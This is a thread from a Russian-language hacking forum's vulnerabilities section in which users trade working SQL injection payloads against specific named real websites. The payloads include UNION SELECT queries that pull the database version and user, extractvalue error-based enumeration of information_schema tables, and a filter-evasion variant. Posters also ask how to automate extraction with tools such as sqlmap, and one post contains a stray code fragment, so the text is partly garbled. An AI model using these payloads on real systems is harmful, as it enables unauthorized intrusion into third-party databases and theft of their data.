HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23141  
Старый 03.01.2014, 19:26
Always
Guest
Сообщений: n/a
Провел на форуме:
17560

Репутация: 0
По умолчанию

Цитата:
Сообщение от er9j6@  
er9j6@ said:
Вбиваешь в Havij, и крутишь
5.1.70-log
так неинтересно!
 
Ответить с цитированием

  #23142  
Старый 03.01.2014, 20:29
Inoms
Guest
Сообщений: n/a
Провел на форуме:
23349

Репутация: 45
По умолчанию

Цитата:
Сообщение от Always  
Always said:
так неинтересно!
В пяти шагах отсюда и union есть: http://www.btlt.ru/comp/index.php?a=f&id=911 union select version(),user(),database()
 
Ответить с цитированием

  #23143  
Старый 03.01.2014, 20:42
Always
Guest
Сообщений: n/a
Провел на форуме:
17560

Репутация: 0
По умолчанию

Цитата:
Сообщение от Inoms  
Inoms said:
В пяти шагах отсюда и union есть: http://www.btlt.ru/comp/index.php?a=f&id=911 union select version(),user(),database()
но мне тот линк интересен, как его крутануть?!
 
Ответить с цитированием

  #23144  
Старый 04.01.2014, 18:39
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

такой вопросец,

http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=ascii(substring(user( ),1,1))

не дает вывода на страницу, почуму?

ведь ascii(substring(user(),1,1)) ровняется 116

так нормальнро выводится

http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=116

я как-то запрос не так составл?
 
Ответить с цитированием

  #23145  
Старый 04.01.2014, 18:55
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от er9j6@  
er9j6@ said:
так не пробовал выводить?
http://www.btlt.ru/comp/index.php?a=f&id=1+union+select+1,2,table_name+fRo M+information_schema.tables+limit+41,1+--+
меня интересует именно мой вопрос
 
Ответить с цитированием

  #23146  
Старый 04.01.2014, 20:06
Inoms
Guest
Сообщений: n/a
Провел на форуме:
23349

Репутация: 45
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
такой вопросец,
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=ascii(substring(user( ),1,1))
не дает вывода на страницу, почуму?
ведь ascii(substring(user(),1,1)) ровняется 116
так нормальнро выводится
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=116
я как-то запрос не так составл?
Вызов функций в limit'е ? lol
 
Ответить с цитированием

  #23147  
Старый 05.01.2014, 00:25
Massay
Guest
Сообщений: n/a
Провел на форуме:
4404

Репутация: 0
По умолчанию

Привет всем, есть инъекция вида

Цитата:
Сообщение от None  
http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--
Как можно автоматизировать подбор limit. И как можно узнать другие базы данных, не information_schema.
 
Ответить с цитированием

  #23148  
Старый 05.01.2014, 02:45
Massay
Guest
Сообщений: n/a
Провел на форуме:
4404

Репутация: 0
По умолчанию

Спасибо большое. Скажите ищо пожалуйста где можно по подробнее прочитать про этот тип инъекций.

Цитата:
Сообщение от OxoTnik  
OxoTnik said:
И что значит
Цитата:
Сообщение от None  
автоматизировать подбор limit
" if author else f"
Цитата:
OxoTnik said:
И что значит
Цитата:
Сообщение от None  
автоматизировать подбор limit
Нужно автоматизировать замену и парсинг limit 1,1 ; limit 2,1 ; limit 3,1 для доставания таблиц и баз автоматически.

Или можно что-то сделать с sqlmap?
 
Ответить с цитированием

  #23149  
Старый 05.01.2014, 16:39
Massay
Guest
Сообщений: n/a
Провел на форуме:
4404

Репутация: 0
По умолчанию

Так что, мне никто не поможет
 
Ответить с цитированием

  #23150  
Старый 05.01.2014, 17:33
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Фильтруется table_name . Что сделать можно?

Цитата:
Сообщение от None  
http://www.rubo.ru/%25D1%2580%25D0%25BE%25D1%2581%25D1%2581%25D0%25B8 %25D1%258F/multday.ru'or(ExtractValue(1,concat(0x3a,(select(t able_name)from(information_schema.tables)limit/**/0,1))))='1
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ